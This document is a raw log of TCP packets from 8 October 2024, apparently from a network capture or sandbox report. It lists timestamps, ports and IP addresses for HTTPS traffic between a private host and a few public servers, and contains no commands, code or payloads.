Oct 8, 2024 20:52:00.352626085 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.352999926 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.353054047 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.355284929 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.355333090 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.360697985 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.404726028 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.404824972 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.404895067 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.405039072 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.407587051 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.407690048 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.428710938 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.457343102 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.457398891 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.457410097 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.457478046 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.460478067 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.460586071 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.465550900 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.493494034 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.495989084 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.521069050 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.521197081 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.521209955 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.521290064 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.521297932 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.521310091 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.521336079 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.523778915 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.523878098 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.529254913 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.560889006 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.560961008 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.560971975 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.561049938 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.564157963 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.564493895 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.569981098 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.608647108 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.608678102 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.608763933 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.611970901 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.628498077 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.628519058 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.628578901 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.630876064 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.630992889 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.642407894 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.666179895 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.666333914 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.666404963 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.668802023 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.668908119 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.675972939 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.732192993 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.734867096 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.736978054 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.737054110 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.737060070 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.737107038 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.782785892 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.804332972 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.804402113 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.804464102 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:00.889513016 CEST	443	49704	13.107.246.60	192.168.2.8
Oct 8, 2024 20:52:00.937057018 CEST	49704	443	192.168.2.8	13.107.246.60
Oct 8, 2024 20:52:07.624586105 CEST	49676	443	192.168.2.8	52.182.143.211
Oct 8, 2024 20:52:09.030853033 CEST	49673	443	192.168.2.8	23.206.229.226
Oct 8, 2024 20:52:09.358932018 CEST	49672	443	192.168.2.8	23.206.229.226
Oct 8, 2024 20:52:09.691210985 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:09.691255093 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:09.691343069 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:09.740457058 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:09.740489006 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:10.233932018 CEST	49677	80	192.168.2.8	192.229.211.108
Oct 8, 2024 20:52:10.239831924 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:10.239924908 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:10.243071079 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:10.243083000 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:10.243369102 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:10.279203892 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:10.323404074 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:10.720041990 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:10.720144033 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:10.720196962 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:10.757673025 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:10.934341908 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:10.934379101 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:10.934463024 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:10.937984943 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:10.938010931 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.072983027 CEST	443	49703	23.206.229.226	192.168.2.8
Oct 8, 2024 20:52:11.073314905 CEST	49703	443	192.168.2.8	23.206.229.226
Oct 8, 2024 20:52:11.446250916 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.446343899 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.447761059 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.447772980 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.448045015 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.449390888 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.491420984 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586081028 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586133957 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586168051 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586198092 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586201906 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.586225986 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586241007 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.586263895 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586291075 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586313009 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.586319923 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586364031 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.586666107 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.586955070 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.587006092 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.587013960 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.591599941 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.591670036 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.591680050 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.640233994 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.674967051 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.675064087 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.675097942 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.675132990 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.675153017 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.675194979 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.675609112 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.675673008 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.675723076 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.675731897 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.676253080 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.676282883 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.676306009 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.676316023 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.676356077 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.676363945 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.677136898 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.677169085 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.677184105 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.677192926 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.677222013 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.677232027 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.677238941 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.677279949 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.678044081 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.678173065 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.678205967 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.678226948 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.678235054 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.678275108 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.678875923 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.678925037 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.678970098 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.678977013 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.681711912 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.681763887 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.681775093 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.734139919 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.764192104 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764287949 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764321089 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764373064 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764379978 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764475107 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.764492989 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764626026 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764661074 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764687061 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764708042 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.764715910 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.764794111 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.764811993 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.764972925 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.765017986 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.765027046 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.765032053 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.765045881 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.765055895 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.765079021 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.765083075 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.766113997 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.766134024 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.766216993 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.766235113 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.766247034 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.766335964 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.766838074 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.766875982 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.766936064 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.766942978 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.766952991 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.766980886 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.767039061 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.767112970 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:11.767118931 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:11.767210007 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.097851992 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.097898006 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.097928047 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.097955942 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.097971916 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.097984076 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098010063 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098037004 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098040104 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098051071 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098089933 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098092079 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098099947 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098138094 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098159075 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098197937 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098203897 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098211050 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098237991 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098261118 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098324060 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098371029 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098371029 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098381996 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098411083 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098414898 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098422050 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098448038 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098454952 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098486900 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098495960 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098501921 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098531008 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098619938 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098663092 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098664999 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098674059 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098707914 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098716021 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098758936 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098762035 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098772049 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098798037 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098802090 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098809004 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.098834038 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.098849058 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.099029064 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099075079 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.099083900 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099126101 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.099127054 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099136114 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099164963 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099164963 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.099175930 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099205971 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099205971 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.099219084 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099246025 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.099246025 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099256992 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099287987 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.099421978 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099473000 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.099608898 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.099659920 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.106390953 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.106430054 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.106481075 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.106489897 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.106525898 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.107065916 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.107083082 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.107135057 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.107144117 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.107156992 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.107558966 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.107573032 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.107609987 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.107619047 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.107642889 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.108975887 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.108989954 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.109025955 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.109034061 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.109080076 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.109724045 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.109740019 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.109806061 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.109814882 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.110125065 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.110142946 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.110183001 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.110191107 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.110213995 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.110378027 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.110390902 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.110440016 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.110446930 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.110476017 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.111233950 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.111253023 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.111304998 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.111313105 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.111351967 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.112189054 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.112204075 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.112273932 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.112282038 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.112335920 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.112924099 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.112938881 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.113006115 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.113013983 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.113986015 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.114003897 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.114039898 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.114047050 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.114074945 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.114197016 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.114209890 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.114274025 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.114283085 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.115159035 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.115175009 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.115381956 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.115397930 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.115961075 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.115973949 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.116018057 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.116027117 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.116053104 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.116398096 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.116414070 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.116442919 CEST	49706	443	192.168.2.8	188.114.96.3
